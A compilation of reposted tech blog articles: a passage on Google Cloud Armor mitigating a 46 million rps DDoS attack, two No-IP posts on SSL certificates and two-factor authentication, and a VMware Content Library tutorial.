Our customer’s network security team deployed the Cloud Armor-recommended rule into their security policy, and it immediately started blocking the attack traffic. In the two minutes that followed, the attack began to ramp up, growing from 100,000 rps to a peak of 46 million rps. Since Cloud Armor was already blocking the attack traffic, the target workload continued to operate normally. Over the next few minutes, the attack started to decrease in size, ultimately ending 69 minutes later at 10:54 a.m. Presumably the attacker likely determined they were not having the desired impact while incurring significant expenses to execute the attack. 

Analyzing the attack

In addition to its unexpectedly high volume of traffic, the attack had other noteworthy characteristics. There were 5,256 source IPs from 132 countries contributing to the attack. As you can see in Figure 2 above, the top 4 countries contributed approximately 31% of the total attack traffic. The attack leveraged encrypted requests (HTTPS) which would have taken added computing resources to generate. Although terminating the encryption was necessary to inspect the traffic and effectively mitigate the attack, the use of HTTP Pipelining required Google to complete relatively few TLS handshakes.  

Approximately 22% (1,169) of the source IPs corresponded to Tor exit nodes, although the request volume coming from those nodes represented just 3% of the attack traffic. While we believe Tor participation in the attack was incidental due to the nature of the vulnerable services, even at 3% of the peak (greater than 1.3 million rps) our analysis shows that Tor exit-nodes can send a significant amount of unwelcome traffic to web applications and services.

The geographic distribution and types of unsecured services leveraged to generate the attack matches the Mēris family of attacks. Known for its massive attacks that have broken DDoS records, the Mēris method abuses unsecured proxies to obfuscate the true origin of the attacks.  

How we stopped the attack

The attack was stopped at the edge of Google’s network, with the malicious requests blocked upstream from the customer’s application. Before the attack started, the customer had already configured Adaptive Protection in their relevant Cloud Armor security policy to learn and establish a baseline model of the normal traffic patterns for their service. 

As a result, Adaptive Protection was able to detect the DDoS attack early in its life cycle, analyze its incoming traffic, and generate an alert with a recommended protective rule–all before the attack ramped up. The customer acted on the alert by deploying the recommended rule leveraging Cloud Armor’s recently launched rate limiting capability to throttle the attack traffic. They chose the ‘throttle’ action over a ‘deny’ action in order to reduce chance of impact on legitimate traffic while severely limiting the attack capability by dropping most of the attack volume at Google’s network edge. 

Before deploying the rule in enforcement mode, it was first deployed in preview mode, which enabled the customer to validate that only the unwelcome traffic would be denied while legitimate users could continue accessing the service. As the attack ramped up to its 46 million rps peak, the Cloud Armor-suggested rule was already in place to block the bulk of the attack and ensure the targeted applications and services remained available. 

Protecting your applications in the cloud

Attack sizes will continue to grow and tactics will continue to evolve. To be prepared, Google recommends using a defense-in-depth strategy by deploying defenses and controls at multiple layers of your environment and your infrastructure providers’ network to protect your web applications and services from targeted web attacks. This strategy includes performing threat modeling to understand your applications’ attack surfaces, developing proactive and reactive strategies to protect them, and architecting your applications with sufficient capacity to manage unanticipated increases in traffic volume. 

With Google Cloud Armor, you are able to protect your internet facing applications at the edge of Google’s network and absorb unwelcome traffic far upstream from your applications.

Source :
https://cloud.google.com/blog/products/identity-security/how-google-cloud-blocked-largest-layer-7-ddos-attack-at-46-million-rps

What are the Benefits of Adding an SSL Certificate to Your No-IP Free, Enhanced or Plus Hostname?

SSL Certificates are a great way to increase the security of your hostname because they add an extra layer of security for you and anyone that visits your hostname. Learn the benefits of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname.

What is an SSL Certificate?
SSL stands for Secure Socket Layer. This means that your hostname is given a secure connection between it, the Internet browser, and the webserver. This allows websites to transmit private data online, without the worry of it being stolen. You can tell when a website has an SSL certificate enabled, when the HTTP in the URL ends with an S, making it an HTTPS. Example: https://www.noip.com.

What are the advantages of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname?

Encryption and Verification

This is the biggest benefit of adding an SSL certificate to your hostname. The extra layer of encryption shows that your hostname is safe for people to visit. All of your visitor’s data will now be transmitted over an encrypted connection to the hostname and others won’t be able to see what is being sent.

The SSL Certificate also checks that the information it receives is coming from the expected domain. So, if your customer sends personal or private information, the SSL Certificate guarantees it is being sent to the secure site, and not to a potentially malicious one.

Ensures Data Integrity

A website that doesn’t have an SSL Certificate enabled sends data in a plain text format. This means that all of the data that is being sent between the server and the browser can be easily read. If a hacker were to gain access to your domain and then change the information being presented on your hostname, this is an example of domain spoofing.

Domain spoofing happens when a hacker gains access to the information on a website and then changes it before it gets sent to the browser for the user. When this happens, the user is typically not even aware they are visiting a compromised website. When an SSL certificate is enabled on the hostname, this becomes much harder as the data is not sent in plain text, but is sent in an encrypted, unreadable format.

Gains Your Users Trust

When you use an SSL Certificate, your hostname shows up with an HTTPS and a lock icon, signifying the hostname is secure. This helps users feel safe when they are on your hostname and makes them feel comfortable if you are asking them to enter sensitive information, like credit cards, or Social Security numbers.

Our Free Dynamic DNS, Enhanced Dynamic DNS and Plus Managed DNS accounts both come with 1 Free TrustCor Standard DV SSL Certificate. Additional SSL Certificates can be purchased and start at just $19.99 per year. You can learn more about each SSL Certificate and how you can add one today here.

Source :
https://www.noip.com/blog/2022/02/22/benefits-adding-ssl-certificate-ip-free-enhanced-hostname/

New Feature Alert : No-IP Announces Two-Factor Authentication

We are so excited to announce the release of Two-Factor Authentication (2FA). This new feature helps keep our customers’ accounts secure by ensuring that only authorized people are able to access accounts. This helps limit the impact of malicious activity because it adds another layer of security on top of your password.

Why Two-Factor Authentication?

You may be wondering why No-IP added 2FA as a security feature, or even how 2FA is different from our current login policy. 2FA is one of the highest levels of security that can be implemented to ensure customer accounts remain secure. 2FA is a security practice that requires you to verify your identity using multiple forms of account verification.

When 2FA is enabled, you will log in with the same username and password, but you will be required to enter a time-based one-time password (TOTP) pin from an authenticator app of your choice on your smartphone.

It is more important than ever to enable data security measures like 2FA whenever possible. As threats like password breaches, keylogging, and other security threats are becoming a normal thing, 2FA is an added layer of account protection.

What are the Benefits of Two-Factor Authentication?

  • Additional layer of security on account login
    2FA requires users to identify themselves through additional verification measures, this helps protect accounts from theft. Making it so a password alone isn’t enough to authenticate a login. Lately, major password breaches across all industries happen so often that even a very secure password can be breached. 2FA adds another layer of security to help reduce this risk.
  • Identity Protection
    Identity theft and data breaches are all too common lately. 2FA ensures that if your username or password were ever leaked, your account is still protected by an additional layer of authentication.
  • Compliance
    Many of our customers work in industries like the Government and Health Industries that require extra compliance for third-party accounts.
  • Effective Cybersecurity Solution
    2FA is an effective strategy to keep accounts safe because it is difficult for hackers to crack both a password and have access to the 2FA device.
  • Easy Implementation
    We have made enabling and using 2FA simple and easy by offering authentication using TOTP, which is supported by various smartphone apps. You choose the one that works best for you.

How Do I Enable 2FA On My No-IP Account?

Login to your No-IP account, you can then find the 2FA option within your No-IP account under “Account” and then click ”Security”.

The first step is to choose which authentication app you will use. We suggest using AuthyDuoLastPass Authenticator, or 1Password. However, any 2FA application app that supports TOTP will work. You will then need to download and install whichever authentication app you choose.

After you have downloaded your authentication app, you will need to follow the steps for that certain app to finish the configuration process and fully activate 2FA. Please ensure that you keep your Recovery Codes in a safe place, so you can always get back into your account.

The following Knowledge Base Guides will help you configure 2FA on your No-IP account for the specific apps listed below. Consult your application’s documentation for support with other TOTP authentication apps.

Authy

Duo

LastPass Authenticator

1Password

What 2FA applications does No-IP Support?

Any 2FA application that works with TOTP will work with No-IP’s 2FA.

Does No-IP Require 2FA?

While we don’t currently require No-IP accounts to have 2FA enabled, we strongly suggest that you enable it. 2FA is a simple solution to help keep your No-IP account secure.

What Happens If I Lose Access To My Two-Factor Authentication App? 

When you set up 2FA you will be provided with ten, one-time-use recovery codes that allow you to get into your account without needing to enter your TOTP code. Each code can only be used one time. If you lose your backup codes and your authentication app, you will no longer be able to access your account. Keep these codes in a safe and secure spot that only you have access to.

If I have 2FA set up, do I need an account Security Question? 

Yes, if you ever need to contact No-IP Customer Support. we will need to verify you. One way of verification is by answering your security question. If you cannot verify your account, we will not be able to assist you.

Will you provide other factors of authentication besides TOTP and Recovery Codes?
For now, we are monitoring the usage of TOTP. However, we’re open to adding additional factors dependent on customer feedback.

Does My Dynamic Update Client (DUC) or Other Update Device Require Two-Factor Authentication When Logging In or Sending Dynamic IP Updates?

No, 2FA will only be prompted on our website at this time. We are currently working on separating the Dynamic Update Client credentials from dynamic updates completely. If you want to use different credentials other than your login, you can set up sub-account groups.

Source :
https://www.noip.com/blog/2022/02/22/new-feature-alert-ip-announces-two-factor-authentication/

SSL Certificate Now Included with No-IP Free Dynamic DNS

A few months ago, we announced that all Enhanced Dynamic DNS subscriptions now include one TrustCor Standard DV SSL Certificate. Well, to finish the year off with a bang, we are here with another announcement!

We now include one TrustCor Standard DV SSL Certificate with every Free Dynamic DNS, Enhanced Dynamic DNS and Plus Managed DNS service. We know that having a secure hostname is important to you and now you can install an SSL on any hostnames managed by No-IP for free!

Our Enhanced Dynamic DNS and Plus Managed DNS customers are eligible to create a TrustCor Standard DV SSL Certificate at any time.  Free Dynamic DNS accounts are eligible to create a certificate on an active hostname after their account has been active for at least 30 days.

What are SSL Certificates?

An SSL certificate allows internet connections between two systems to be authenticated and encrypted. This allows people to connect to your server and send information without anyone in the middle being able to see what is being sent. Most browsers will display a security warning to your site’s visitors if you do not have a valid certificate installed.

Why is a TrustCor Standard DV SSL Certificates (Included with No-IP Free Dynamic DNS) better than a different free SSL Certificate solution?

  • Our free TrustCor Standard DV SSL Certificates are valid for a year, but can be easily reissued. Free SSL Certificates from others require validation once every 90 days.
  • Domain Validation is automated and happens instantly. No more waiting around for your domain to be verified. Other solutions can take days and are not automated with No-IP.
  • TXT Record automatically added for domain validation.
  • Very rapid time to issue and validate (typically within 20 minutes).
  • Strongest SSL encryption using SHA-2 algorithms and 2048-bit RSA keys.

If you are already a Free Dynamic DNS customer, follow these simple instructions to add your TrustCor Standard DV SSL Certificate to your hostname

Not currently a No-IP customer? Let us introduce ourselves to you. 

We are a Dynamic DNS and Managed DNS company that has been around since 1999. We have over 30 million customers, all around the world who utilize our services for remote accessing devices in a simple and secure way that eliminates the need to use third-party cloud services.

We offer a Free Dynamic DNS service that millions of customers use daily to access their devices from anywhere. Whether it is checking in on a loved one via a remote security cameraaccessing a computer remotely, or even running a game server to play games with friends and family safely, No-IP has a remote access solution that works! To learn more about our Free Dynamic DNS, check out our Remote Access and sign up for your Free Dynamic DNS account now.

Source :
https://www.noip.com/blog/2021/12/17/ssl-certificate-now-included-with-free-dynamic-dns/

Manage resources across sites with the VMware Content Library

A VMware vSphere environment includes many components to deliver business-critical workloads and services. However, there is a feature of today’s modern VMware vSphere infrastructure that is arguably underutilized – the VMware Content Library. Nevertheless, it can be a powerful tool that helps businesses standardize the workflow using files, templates, ISO images, vApps, scripts, and other resources to deploy and manage virtual machines. So how can organizations manage resources across sites with the VMware Content Library?

What is the VMware Content Library?

Most VI admins will agree with multiple vCenter Servers in the mix, managing files, ISOs, templates, vApps, and other resources can be challenging. For example, have you ever been working on one cluster and realized you didn’t have the ISO image copied to a local datastore that is accessible, and you had to “sneakernet” the ISO where you could mount and install it? What about virtual machine templates? What if you want to have the virtual machine templates in one vCenter Server environment available to another vCenter Server environment?

The VMware Content Library is a solution introduced in vSphere 6.0 that allows customers to keep their virtual machine resources synchronized in one place and prevent the need for manual updates to multiple templates and copying these across between vCenter Servers. Instead, administrators can create a centralized repository using the VMware Content Library from which resources can be updated, shared, and synchronized between environments.

Using the VMware Content Library, you essentially create a container that can house all of the important resources used in your environment, including VM-specific objects like templates and other files like ISO image files, text files, and other file types.

The VMware Content Library stores the content as a “library item.” Each VMware Content Library can contain many different file types and multiple files. VMware gives the example of the OVF file that you can upload to your VMware Content Library. As you know, the OVF file is a bundle of multiple files. However, when you upload the OVF template, you will see a single library entry.

VMware has added some excellent new features to the VMware Content Library features in the past few releases. These include the ability to add OVF security policies to a content library. The new OVF security policy was added in vSphere 7.0 Update 3. It allows implementing strict validation for deploying and updating content library items and synchronizing templates. One thing you can do is make sure a trusted certificate signs the templates. To do this, you can deploy a signing certificate for your OVFs from a trusted CA to your content library.

Another recent addition to the VMware Content Library functionality introduced in vSphere 6.7 Update 1 is uploading a VM template type directly to the VMware Content Library. Previously, VM templates were converted to an OVF template type. Now, you can work directly with virtual machine templates in the VMware Content Library.

VMware Content Library types

VMware Content Library enables managing resources across sites using two different types of content libraries. These include the following:

  • Local Content Library – A local content library is a VMware Content Library used to store and manage content residing in a single vCenter Server environment. Suppose you work in a single vCenter Server environment and want to have various resources available across all your ESXi hosts to deploy VMs, vAPPs, install from ISO files, etc. In that case, the local content library allows doing that. With the local content library, you can choose to Publish the local content library. When you publish the Content Library, you are making it available to be subscribed to or synchronized.
  • Subscribed Content Library – The other type of Content Library is the subscribed content library. When you add a subscribed VMware Content Library type, you are essentially downloading published items from a VMware Content Library type that has published items as mentioned in the Local Content Library section. In this configuration, you are only a consumer of the VMware Content Library that someone else has published. It means when creating the Content Library, the publish option was configured. You can’t add templates and other items to the subscribed VMware Content Library type as you can only synchronize the content of the subscribed Content Library with the content of the published Content Library.
    • With a subscribed library, you can choose to download all the contents of the published Content Library immediately once the subscribed Content Library is created. You can also choose to download only the metadata for items in the published Content Library and download the entire contents of the items you need. You can think of this as a “files on-demand” type feature that only downloads the resources when these are required.

Below is an example of the screen when configuring a content library that allows creating either a Local Content Library or the Subscribed Content Library:

Choosing the content library type


Choosing the content library type

Create a local or subscription Content Library in vSphere 7

Creating a new VMware Content Library is a relatively straightforward and intuitive process you can accomplish in the vSphere Client. Let’s step through the process to create a new VMware Content Library. We will use the vSphere Web Client to manage and configure the Content Library Settings.

Using the vSphere Web Client to manage the Content Library

First, click the upper left-hand “hamburger” menu in the vSphere Client. You will see the option Content Libraries directly underneath the Inventory menu when you click the menu.

Choosing the Content Libraries option to create a manage Content Libraries


Choosing the Content Libraries option to create a manage Content Libraries

Under the Content Libraries screen, you can Create new Content Libraries.

Creating a new Content Library in the vSphere Client


Creating a new Content Library in the vSphere Client

It will launch the New Content Library wizard. In the Name and Location screen, name the new VMware Content Library.

New Content Library name and location


New Content Library name and location

On the Configure content library step, you configure the content library type, including configuring a local content library or a subscribed content library. Under the configuration for Local content library, you can Enable publishing. If publishing is enabled, you can also enable authentication.

Configuring the Content Library type


Configuring the Content Library type

When you configure publishing and authentication, you can configure a password on the content library.

Apply security policy step

Step 3 is the Apply security policy step. It allows applying the OVF default policy to protect and enforce strict validation while importing and synchronizing OVF library items.

Choosing to apply the OVF default policy


Choosing to apply the OVF default policy

The VMware Content Library needs to have a storage location that will provide the storage for the content library itself. First, select the datastore you want to use for storing your content library. The beauty of the content library is that it essentially publishes and shares the items in the content library itself, even though they may be housed on a particular datastore.

Select the storage to use for storing items in the VMware Content Library


Select the storage to use for storing items in the VMware Content Library

Finally, we are ready to complete the creation of the Content Library. Click Finish.

Finishing the creation of the VMware Content Library


Finishing the creation of the VMware Content Library

Once the VMware Content Library is created, you can see the details of the library, including the Publication section showing the Subscription URL.

Viewing the settings of a newly created VMware Content Library


Viewing the settings of a newly created VMware Content Library

As a note. If you click the Edit Settings hyperlink under the Publication settings pane, you can go in and edit the settings of the Content Library, including the publishing options, authentication, changing the authentication password, and applying a security policy.

Editing the settings of a VMware Content Library


Editing the settings of a VMware Content Library

Creating a subscribed VMware Content Library

As we mentioned earlier, configuring a subscribed content library means synchronizing items from a published content library. In the New Content Library configuration wizard, you choose the Subscribed content library option to synchronize with a published content library. Then, enter the subscription URL for the published content library when selected. As shown above, this URL is found in the settings of the published content library.

You will need to also place a check in the Enable authentication setting if the published content library was set up with authentication. Then, enter the password configured for the published content library. Also, note the configuration for downloading content. As detailed earlier, you can choose to synchronize items immediately, meaning the entire content library will be fully downloaded. Or, you can select when needed, which acts as a “files on demand” configuration that only downloads the resources when needed.

Configuring the subscribed content library


Configuring the subscribed content library

Choose the storage for the subscribed Content Library.

Add storage for the subscribed VMware Content Library

Add storage for the subscribed VMware Content Library

Ready to complete adding a new subscribed VMware Content Library. Click Finish.

Ready to complete adding a subscribed VMware Content Library


Ready to complete adding a subscribed VMware Content Library

Interestingly, you can add a subscribed VMware Content Library that is subscribed to the same published VMware Content Library on the same vCenter Server.

Published and subscribed content library on the same vCenter Server


Published and subscribed content library on the same vCenter Server

What is Check-In/Check-Out?

A new feature included with VMware vSphere 7 is versioning with the VMware Content Library. So often, with virtual machine templates, these are frequently changed, updated, and configured. As a result, it can be easy to lose track of the changes made, the user making the modifications, and track the changes efficiently.

Now, VMware vSphere 7 provides visibility into the changes made to virtual machine templates with a new check-in/check-out process. This change embraces DevOps workflows with a way for IT admins to check in and check out virtual machine templates in and out of the Content Library.

Before the new check-in/check-out feature, VI admins might use a process similar to the following to change a virtual machine template:

  1. Convert a virtual machine template to a virtual machine
  2. Place a snapshot on the converted template to machine VM
  3. Make whatever changes are needed to the VM
  4. Power the VM off and convert it back to a template
  5. Re-upload the VM template back to the Content Library
  6. Delete the old template
  7. Internally notify other VI admins of the changes

Now, VI admins can use a new capability in vSphere 7.0 and higher to make changes to virtual machine templates more seamlessly and track those changes effectively.

Clone as template to Library

The first step is to house the virtual machine template in the Content Library. Right-click an existing virtual machine to use the new functionality and select Clone as Template to Library.

Clone as Template to Library functionality to use the check-in and check-out feature


Clone as Template to Library functionality to use the check-in and check-out feature

As a note, if you see the Clone to Library functionality instead of Clone as Template to Library, it means you have not converted the VM template to a virtual machine. If you right-click a VM template, you only get the Clone to Library option. If you select Clone to Template, it only allows cloning the template in a traditional way to another template on a datastore.

Right-clicking and cloning a VM template only gives the option to Clone to Library


Right-clicking and cloning a VM template only gives the option to Clone to Library

Continuing with the Clone to Library process, you will see the Clone to Template in Library dialog box open. Select either New template or Update the existing template.

Clone to Template in Library


Clone to Template in Library

In the vCenter Server tasks, you will see the process begin to Upload files to a Library and Transfer files.

Uploading a virtual machine template to the Content Library


Uploading a virtual machine template to the Content Library

When you right-click a virtual machine and not a virtual machine template, you will see the additional option of Clone as Template to Library.

Clone as Template to Library


Clone as Template to Library

It then brings up a more verbose wizard for the Clone Virtual Machine To Template process. The first screen is the Basic information where you define the Template type (can be OVF or VM Template), the name of the template, notes, and select a folder for the template.

Configuring basic information for the clone virtual machine to template process


Configuring basic information for the clone virtual machine to template process

On the Location page, you select the VMware Content Library you want to use to house the virtual machine template.

Select the VMware Content Library to house the virtual machine template


Select the VMware Content Library to house the virtual machine template

Select a compute resource to house your cloned VM template.

Select the compute resource for the virtual machine template


Select the compute resource for the virtual machine template

Select the storage for the virtual machine template.

Select storage to house the VM template


Select storage to house the VM template

Finish the Clone Virtual Machine to Template process.

Finish the clone of the virtual machine to template in the VMware Content Library


Finish the clone of the virtual machine to template in the VMware Content Library

If you navigate to the Content Library, you will see the template listed under the VM Templates in the Content Library.

Viewing the VM template in the Content Library


Viewing the VM template in the Content Library

Checking templates in and out

If you select the radio button next to the VM template, the Check Out VM From This Template button will appear to the right.

Launching the Check out VM from this template


Launching the Check out VM from this template

When you click the button, it will launch the Check out VM from VM Template wizard. First, name the new virtual machine that will be created in the check-out process.

Starting the Check out VM from VM template


Starting the Check out VM from VM template

Select the compute resource to house the checked-out virtual machine.

Selecting a compute resource


Selecting a compute resource

Review and finish the Check out VM from VM template process. You can select to power on VM after check out.

Review and Finish the Check out VM from VM Template


Review and Finish the Check out VM from VM Template

The checked-out virtual machine will clone from the existing template in the Content Library. Also, you will see an audit trail of the check-outs from the Content Library. You are directed to Navigate to the checked-out VM to make updates. Note you then have the button available to Check In VM to Template.

Virtual machine template is checked out and deployed as a virtual machine in inventory


Virtual machine template is checked out and deployed as a virtual machine in inventory

If you navigate to the Inventory view in the vSphere Client, you will see the machine has a tiny blue dot in the lower left-hand corner of the virtual machine icon.

Viewing the checked-out VM template as a virtual machine in vSphere inventory


Viewing the checked-out VM template as a virtual machine in vSphere inventory

After making one small change, such as changing the virtual network the virtual machine is connected to, we see the option appear to Check In VM to Template.

Check In VM to Template


Check In VM to Template

It will bring up the Check In VM dialog box, allowing you to enter notes and then click the Check In button.

Check In the VM


Check In the VM

We see the audit trail of changes reflected in the Content Library with the notes we entered in the Check in notes.

Virtual machine template checked back in with the notes entered in the check-in process


Virtual machine template checked back in with the notes entered in the check-in process

You will also see a new Versioning tab displayed when you view the virtual machine template in the inventory view.

Viewing the versioning of a virtual machine template in the inventory view


Viewing the versioning of a virtual machine template in the inventory view

VMware Content Library Roles

There are various privileges related to Content Library privileges. VMware documents the following privileges that can be assigned to a custom VMware Content Library Role.

Privilege NameDescriptionRequired On
Content library.Add library itemAllows addition of items in a library.Library
Content library.Add root certificate to trust storeAllows addition of root certificates to the Trusted Root Certificates Store.vCenter Server
Content library.Check in a templateAllows checking in of templates.Library
Content library.Check out a templateAllows checking out of templates.Library
Content library.Create a subscription for a published libraryAllows creation of a library subscription.Library
Content library.Create local libraryAllows creation of local libraries on the specified vCenter Server system.vCenter Server
Content library.Create or delete a Harbor registryAllows creation or deletion of the VMware Tanzu Harbor Registry service.vCenter Server for creation. Registry for deletion.
Content library.Create subscribed libraryAllows creation of subscribed libraries.vCenter Server
Content library.Create, delete or purge a Harbor registry projectAllows creation, deletion, or purging of VMware Tanzu Harbor Registry projects.Registry
Content library.Delete library itemAllows deletion of library items.Library. Set this permission to propagate to all library items.
Content library.Delete local libraryAllows deletion of a local library.Library
Content library.Delete root certificate from trust storeAllows deletion of root certificates from the Trusted Root Certificates Store.vCenter Server
Content library.Delete subscribed libraryAllows deletion of a subscribed library.Library
Content library.Delete subscription of a published libraryAllows deletion of a subscription to a library.Library
Content library.Download filesAllows download of files from the content library.Library
Content library.Evict library itemAllows eviction of items. The content of a subscribed library can be cached or not cached. If the content is cached, you can release a library item by evicting it if you have this privilege.Library. Set this permission to propagate to all library items.
Content library.Evict subscribed libraryAllows eviction of a subscribed library. The content of a subscribed library can be cached or not cached. If the content is cached, you can release a library by evicting it if you have this privilege.Library
Content library.Import StorageAllows a user to import a library item if the source file URL starts with ds:// or file://. This privilege is disabled for content library administrator by default. Because an import from a storage URL implies import of content, enable this privilege only if necessary and if no security concern exists for the user who performs the import.Library
Content library.Manage Harbor registry resources on specified compute resourceAllows management of VMware Tanzu Harbor Registry resources.Compute cluster
Content library.Probe subscription informationThis privilege allows solution users and APIs to probe a remote library’s subscription info including URL, SSL certificate, and password. The resulting structure describes whether the subscription configuration is successful or whether there are problems such as SSL errors.Library
Content library.Publish a library item to its subscribersAllows publication of library items to subscribers.Library. Set this permission to propagate to all library items.
Content library.Publish a library to its subscribersAllows publication of libraries to subscribers.Library
Content library.Read storageAllows reading of content library storage.Library
Content library.Sync library itemAllows synchronization of library items.Library. Set this permission to propagate to all library items.
Content library.Sync subscribed libraryAllows synchronization of subscribed libraries.Library
Content library.Type introspectionAllows a solution user or API to introspect the type support plug-ins for the content library service.Library
Content library.Update configuration settingsAllows you to update the configuration settings.Library
No vSphere Client user interface elements are associated with this privilege.
Content library.Update filesAllows you to upload content into the content library. Also allows you to remove files from a library item.Library
Content library.Update libraryAllows updates to the content library.Library
Content library.Update library itemAllows updates to library items.Library. Set this permission to propagate to all library items.
Content library.Update local libraryAllows updates of local libraries.Library
Content library.Update subscribed libraryAllows you to update the properties of a subscribed library.Library
Content library.Update subscription of a published libraryAllows updates of subscription parameters. Users can update parameters such as the subscribed library’s vCenter Server instance specification and placement of its virtual machine template items.Library
Content library.View configuration settingsAllows you to view the configuration settings.Library
No vSphere Client user interface elements are associated with this privilege.

Advanced Content Library settings

Several advanced configuration settings are configurable with the VMware Content Library. You can get to these by navigating to Content Libraries > Advanced.

Content Library advanced settings


Content Library advanced settings

These include the following settings as detailed by VMware:

Configuration ParameterDescription
Library Auto Sync EnabledThis setting enables automatic synchronization of subscribed content libraries.
Library Auto Sync Refresh Interval (minutes)The Interval between two consequent automatic synchronizations of the subscribed content library. This interval is measured in minutes.
Library Auto Sync Setting Refresh Interval (seconds)This is the Interval after which the refresh interval for the automatic synchronization settings of the subscribed library will be updated if it has been changed. It is measured in seconds. A change in the refresh interval requires a restart of vCenter Server.
Library Auto Sync Start HourThis setting refers to the time of day when the automatic synchronization of a subscribed content library begins
Library Auto Sync Stop HourThis setting refers to the time of day when the automatic synchronization of a subscribed content library stops. Automatic synchronization stops until the start hour.
Library Maximum Concurrent Sync ItemsThe maximum number of items concurrently synchronizing for each subscribed library.
Max concurrent NFC transfers per ESX hostThe maximum concurrent NFC transfers per ESXi host limit
Maximum Bandwidth ConsumptionThe bandwidth usage threshold. It is measured in Mbps across all transfers where 0 means unlimited bandwidth.
Maximum Number of Concurrent Priority TransfersThe Concurrent transfer limit for priority files. Tranfers are queued if the bandwidth limit is exceeded. This threadpool is used only to transfer priority objects. For example, if you change the concurrent transfer limit for priority files, such as OVF, you must restart vCenter Server.
Maximum Number of Concurrent TransfersConcurrent transfer limit. When exceeded, the transfers are queued. If you change the concurrent transfer limit, it requires a restart of vCenter Server.

To properly protect your VMware environment, use Altaro VM Backup to securely backup and replicate your virtual machines. We work hard perpetually to give our customers confidence in their VMware backup strategy.

To keep up to date with the latest VMware best practices, become a member of the VMware DOJO now (it’s free).

Wrapping up

The VMware Content Library provides a centralized repository that allows keeping required file resources, virtual machine templates, ISO images vApps, and other files synchronized and available across the vSphere datacenter. In vSphere 7, the Content Library allows organizations to have a better way to keep up with and track changes to virtual machine templates. Using the new check-in/check-out process, VI admins can track changes made with each check-out and ensure these are documented and synchronized back to the Content Library.

It effectively provides a solution to remove the need to copy files between ESXi hosts or vSphere clusters and have what you need to install guest operating systems or deploy virtual machine templates. In addition, the subscribed Content Library allows synchronizing vCenter Server content libraries so that many other vCenter Servers can take advantage of the files already organized in the published Content Library.

The VMware Content Library is one of the more underutilized tools in the VI admin’s toolbelt that can bring about advantages in workflow, efficiency, and time spent finding and organizing files for deploying VMs and OS’es. In addition, the recent feature additions and improvements, such as check-ins/check-outs, have provided a more DevOps approach to tracking and working with deployment resources.

Source :
https://www.altaro.com/vmware/vmware-content-library/